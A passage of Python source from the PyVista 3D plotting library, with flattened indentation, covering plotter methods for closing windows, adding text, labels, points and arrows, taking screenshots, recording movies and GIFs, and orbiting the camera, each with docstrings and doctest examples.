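Shift the points of a mesh along the z-axis (an illustrative sketch).
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> plotter.update_coordinates(sphere.points + [0, 0, 1], render=False)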
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self, render=False):
"""Close the render window.
Parameters
----------
render : bool
Unused argument.
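Examples
--------
Close the render window after showing it (an illustrative sketch).
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.show() # doctest:+SKIP
>>> plotter.close()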
"""
# optionally run just prior to exiting the plotter
if self._before_close_callback is not None:
self._before_close_callback(self)
self._before_close_callback = None
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
self.renderers.close()
self.renderers.remove_all_lights()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
# reset scalar bars
self.clear()
# grab the display id before clearing the window
# this is an experimental feature
if KILL_DISPLAY: # pragma: no cover
disp_id = None
if hasattr(self, 'ren_win'):
disp_id = self.ren_win.GetGenericDisplayId()
self._clear_ren_win()
if self.iren is not None:
self.iren.remove_observers()
self.iren.terminate_app()
if KILL_DISPLAY: # pragma: no cover
_kill_display(disp_id)
self.iren = None
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
if hasattr(self, 'renderers'):
self.renderers.deep_clean()
if getattr(self, 'mesh', None) is not None:
self.mesh.point_data = None
self.mesh.cell_data = None
self.mesh = None
if getattr(self, 'mapper', None) is not None:
self.mapper.lookup_table = None
self.mapper = None
self.volume = None
self.textActor = None
def add_text(
self,
text,
position='upper_left',
font_size=18,
color=None,
font=None,
shadow=False,
name=None,
viewport=False,
*,
render=True,
):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add to the rendering.
position : str, tuple(float), optional
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general ``vtkOpenGLTextActor``.
If a string name is used, it returns a ``vtkCornerAnnotation``
object normally used for fixed labels (like a title or xlabel).
Default is to find the top left corner of the rendering window
and place the text box there. Available positions: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``.
font_size : float, optional
Sets the size of the title font. Defaults to 18.
color : color_like, optional
Either a string, RGB list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`.
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport : bool, optional
If ``True`` and position is a tuple of float, uses the
normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> actor = pl.add_text('Sample Text', position='upper_right', color='blue',
... shadow=True, font_size=26)
>>> pl.show()
"""
if font is None:
font = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': _vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': _vtk.vtkCornerAnnotation.LowerRight,
'upper_left': _vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': _vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': _vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': _vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = _vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = _vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(
Color(color, default_color=self._theme.font.color).float_rgb
)
self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value)
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False, render=render)
return self.textActor
def open_movie(self, filename, framerate=24, quality=5, **kwargs):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imageio.get_writer``.
framerate : int, optional
Frames per second.
quality : int, optional
Quality 10 is the top possible quality for any codec. The
range is ``0 - 10``. Higher quality leads to a larger file.
**kwargs : dict, optional
See the documentation for ``imageio.get_writer`` for additional kwargs.
Notes
-----
See the documentation for `imageio.get_writer
<https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_
Examples
--------
Open a MP4 movie and set the quality to maximum.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP
"""
from imageio import get_writer
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in ``"gif"``.
Examples
--------
Open a gif file.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.open_gif('movie.gif') # doctest:+SKIP
"""
from imageio import get_writer
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.open_movie('movie.mp4') # doctest:+SKIP
>>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP
See :ref:`movie_example` for a full example using this method.
"""
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.update()
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self, fill_value=np.nan, reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float, optional
Fill value for points in image that do not include objects
in scene. To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool, optional
Reset the camera clipping range to include data in view.
Returns
-------
numpy.ndarray
Image of depth values from camera orthogonal to image
plane.
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.store_image = True
>>> plotter.show()
>>> zval = plotter.get_image_depth()
"""
# allow no render window
if not hasattr(self, 'ren_win') and self.last_image_depth is not None:
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
self._check_rendered()
self._check_has_ren_win()
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = _vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.clipping_range
if self.camera.parallel_projection:
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far))
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
def add_lines(self, lines, color='w', width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line
segments would be represented as ``np.array([[0, 0, 0],
[1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
color : color_like, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
width : float, optional
Thickness of lines.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
vtk.vtkActor
Lines actor.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]])
>>> actor = pl.add_lines(points, color='yellow', width=3)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = _vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = Color(color)
# Create actor
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color.float_rgb)
actor.GetProperty().SetColor(rgb_color.float_rgb)
actor.GetProperty().LightingOff()
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [lines, label, rgb_color]
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
@wraps(ScalarBars.remove_scalar_bar)
def remove_scalar_bar(self, *args, **kwargs):
"""Remove the active scalar bar."""
self.scalar_bars.remove_scalar_bar(*args, **kwargs)
def add_point_labels(
self,
points,
labels,
italic=False,
bold=True,
font_size=None,
text_color=None,
font_family=None,
shadow=False,
show_points=True,
point_color=None,
point_size=5,
name=None,
shape_color='grey',
shape='rounded_rect',
fill_shape=True,
margin=3,
shape_opacity=1.0,
pickable=False,
render_points_as_spheres=False,
tolerance=0.001,
reset_camera=None,
always_visible=False,
render=True,
):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : sequence or pyvista.DataSet
An ``n x 3`` sequence points or pyvista dataset with points.
labels : list or str
List of labels. Must be the same length as points. If a
string name is given with a :class:`pyvista.DataSet` input for
points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default ``False``.
bold : bool, optional
Bolds title and bar labels. Default ``True``.
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : color_like, optional
Color of text. Either a string, RGB sequence, or hex color string.
* ``text_color='white'``
* ``text_color='w'``
* ``text_color=[1.0, 1.0, 1.0]``
* ``text_color='#FFFFFF'``
font_family : str, optional
Font family. Must be either ``'courier'``, ``'times'``,
or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
show_points : bool, optional
Controls if points are visible. Default ``True``.
point_color : color_like, optional
Either a string, rgb list, or hex color string. One of
the following.
* ``point_color='white'``
* ``point_color='w'``
* ``point_color=[1.0, 1.0, 1.0]``
* ``point_color='#FFFFFF'``
point_size : float, optional
Size of points if visible.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
shape_color : color_like, optional
Color of points (if visible). Either a string, rgb
sequence, or hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``.
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float, optional
The opacity of the shape in the range of ``[0, 1]``.
pickable : bool, optional
Set whether this actor is pickable.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
tolerance : float, optional
A tolerance to use to determine whether a point label is
visible. A tolerance is usually required because the
conversion from world space to display space during
rendering introduces numerical round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0.0, 0.0, 0.0],
... [1.0, 1.0, 0.0],
... [2.0, 0.0, 0.0]])
>>> labels = ['Point A', 'Point B', 'Point C']
>>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20,
... point_color='red', point_size=20,
... render_points_as_spheres=True,
... always_visible=True, shadow=True)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if font_family is None:
font_family = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
point_color = Color(point_color, default_color=self._theme.color)
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_data[labels]
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = _vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = _vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = _vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = _vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
    labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
    labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(Color(shape_color).float_rgb)
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(Color(text_color, default_color=self._theme.font.color).float_rgb)
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
self.add_mesh(
vtkpoints,
color=point_color,
point_size=point_size,
name=f'{name}-points',
pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera,
render=render,
)
label_actor = _vtk.vtkActor2D()
label_actor.SetMapper(labelMapper)
self.add_actor(label_actor, reset_camera=False, name=f'{name}-labels', pickable=False)
return label_actor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
An ``n x 3`` numpy.ndarray or pyvista dataset with points.
labels : str, optional
String name of the point data array to use.
fmt : str, optional
String formatter used to format numerical data.
preamble : str, optional
Text before the start of each label.
**kwargs : dict, optional
Keyword arguments passed to
:func:`pyvista.BasePlotter.add_point_labels`.
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
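Examples
--------
Label the points of a sphere with their z-coordinate values (an
illustrative sketch using a point array named ``'z'``).
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['z'] = sphere.points[:, 2]
>>> pl = pyvista.Plotter()
>>> actor = pl.add_point_scalar_labels(sphere, 'z', fmt='%.2f')
>>> pl.show()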
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = self._theme.font.fmt
if fmt is None:
fmt = '%.6e'
scalars = points.point_data[labels]
phrase = f'{preamble} {fmt}'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
Array of points or the points from a pyvista object.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
Actor of the mesh.
Examples
--------
Add a numpy array of points to a mesh.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> pl = pyvista.Plotter()
>>> actor = pl.add_points(points, render_points_as_spheres=True,
... point_size=100.0)
>>> pl.show()
"""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to the plotter.
Parameters
----------
cent : np.ndarray
Array of centers.
direction : np.ndarray
Array of direction vectors.
mag : float, optional
Amount to scale the direction vectors.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the arrows.
Examples
--------
Plot a random field of vectors and save a screenshot of it.
>>> import numpy as np
>>> import pyvista
>>> cent = np.random.random((10, 3))
>>> direction = np.random.random((10, 3))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_arrows(cent, direction, mag=2)
>>> plotter.show()
"""
if cent.shape != direction.shape: # pragma: no cover
raise ValueError('center and direction arrays must have the same shape')
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
if mag != 1:
direction = direction * mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = _vtk.vtkArrowSource()
arrow.Update()
glyph3D = _vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img):
"""Save to file and/or return a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file if requested
if isinstance(filename, (str, pathlib.Path, io.BytesIO)):
from PIL import Image
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in SUPPORTED_FORMATS:
raise ValueError(
f'Unsupported extension {filename.suffix}\n'
f'Must be one of the following: {SUPPORTED_FORMATS}'
)
filename = os.path.abspath(os.path.expanduser(str(filename)))
Image.fromarray(image).save(filename)
else:
Image.fromarray(image).save(filename, format="PNG")
# return image array if requested
if return_img:
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
This can be helpful for publication documents.
The supported formats are:
* ``'.svg'``
* ``'.eps'``
* ``'.ps'``
* ``'.pdf'``
* ``'.tex'``
Parameters
----------
filename : str
Path to save the graphic file to.
title : str, optional
Title to use within the file properties.
raster : bool, optional
Attempt to write 3D properties as a raster image.
painter : bool, optional
Configure the exporter to expect a painter-ordered 2D
rendering, that is, a rendering at a fixed depth where
primitives are drawn from the bottom up.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True)
>>> _ = pl.add_background_image(examples.mapfile)
>>> pl.save_graphic("img.svg") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
writer = _vtk.lazy_vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
if extension not in modes:
raise ValueError(
f"Extension ({extension}) is an invalid choice.\n\n"
f"Valid options include: {', '.join(modes.keys())}"
)
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
def screenshot(
self, filename=None, transparent_background=None, return_img=True, window_size=None
):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, pathlib.Path, BytesIO, optional
Location to write image to. If ``None``, no image is written.
transparent_background : bool, optional
Whether to make the background transparent. The default is
looked up on the plotter's theme.
return_img : bool, optional
If ``True`` (the default), a NumPy array of the image will
be returned.
window_size : 2-length tuple, optional
Set the plotter's size to this ``(width, height)`` before
taking the screenshot.
Returns
-------
numpy.ndarray
Array containing pixel RGB and alpha. Sized:
* [Window height x Window width x 3] if
``transparent_background`` is set to ``False``.
* [Window height x Window width x 4] if
``transparent_background`` is set to ``True``.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = self._theme.transparent_background
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery to work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if self.last_image is not None:
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise RuntimeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError(
"Nothing to screenshot - call .show first or use the off_screen argument"
)
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
return self._save_image(self.image, filename, return_img)
@wraps(Renderers.set_background)
def set_background(self, *args, **kwargs):
"""Wrap ``Renderers.set_background``."""
self.renderers.set_background(*args, **kwargs)
def generate_orbital_path(self, factor=3.0, n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float, optional
A scaling factor when building the orbital extent.
n_points : int, optional
Number of points on the orbital path.
viewup : list(float), optional
The normal to the orbital plane.
shift : float, optional
Shift the plane up/down from the center of the scene by
this amount.
Returns
-------
pyvista.PolyData
PolyData containing the orbital path.
Examples
--------
Generate an orbital path around a sphere.
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50,
... shift=0.0, viewup=viewup)
See :ref:`orbiting_example` for a full example using this method.
"""
if viewup is None:
viewup = self._theme.camera['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
Parameters
----------
point : sequence
Point to fly to in the form of ``(x, y, z)``.
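Examples
--------
Fly the camera towards the top of a sphere (an illustrative sketch;
requires an active interactor, so ``show`` is called first).
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pyvista.Sphere())
>>> pl.show(auto_close=False) # doctest:+SKIP
>>> pl.fly_to((0.0, 0.0, 0.5)) # doctest:+SKIP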
"""
self.iren.fly_to(self.renderer, point)
def orbit_on_path(
self,
path=None,
focus=None,
step=0.5,
viewup=None,
write_frames=False,
threaded=False,
progress_bar=False,
):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel.
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position.
viewup : list(float), optional
The normal to the orbital plane.
write_frames : bool, optional
Assume a file is open and write a frame on each camera
view during the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
progress_bar : bool, optional
Show the progress bar when proceeding through the path.
This can be helpful to show progress when generating
movies with ``off_screen=True``.
Examples
--------
Plot an orbit around the earth. Save the gif as a temporary file.
>>> import tempfile
>>> import os
>>> import pyvista
>>> filename = os.path.join(tempfile._get_default_tempdir(),
... next(tempfile._get_candidate_names()) + '.gif')
>>> from pyvista import examples
>>> plotter = pyvista.Plotter(window_size=[300, 300])
>>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True)
>>> plotter.open_gif(filename)
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24,
... shift=0.0, viewup=viewup)
>>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup,
... step=0.02)
See :ref:`orbiting_example` for a full example using this method.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = self._theme.camera['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.thickness = path.length
if progress_bar:
try:
from tqdm import tqdm
except ImportError: # pragma: no cover
raise ImportError("Please install `tqdm` to use ``progress_bar=True``")
def orbit():
"""Define the internal thread for running the orbit."""
if progress_bar:
points_seq = tqdm(points)
else:
points_seq = points
for point in points_seq:
tstart = time.time() # include the render time in the step time
self.set_position(point, render=False)
self.set_focus(focus, render=False)
self.set_viewup(viewup, render=False)
self.renderer.ResetCameraClippingRange()
if write_frames:
self.write_frame()
else:
self.render()
sleep_time = step - (time.time() - tstart)
if sleep_time > 0:
time.sleep(sleep_time)
if write_frames:
self.mwriter.close()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
Parameters
----------
filename : str
Filename to export the scene to. A filename extension of
``'.vtkjs'`` will be added.
compress_arrays : bool, optional
Enable array compression.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_hexbeam())
>>> pl.export_vtkjs("sample") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format.
Parameters
----------
filename : str
Filename to export the scene to. Should end in ``'.obj'``.
Returns
-------
vtkOBJExporter
Object exporter.
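Examples
--------
Export a scene to an OBJ file (an illustrative sketch; the filename
is used as a prefix for the exported files).
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pyvista.Sphere())
>>> pl.export_obj('scene.obj') # doctest:+SKIP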
"""
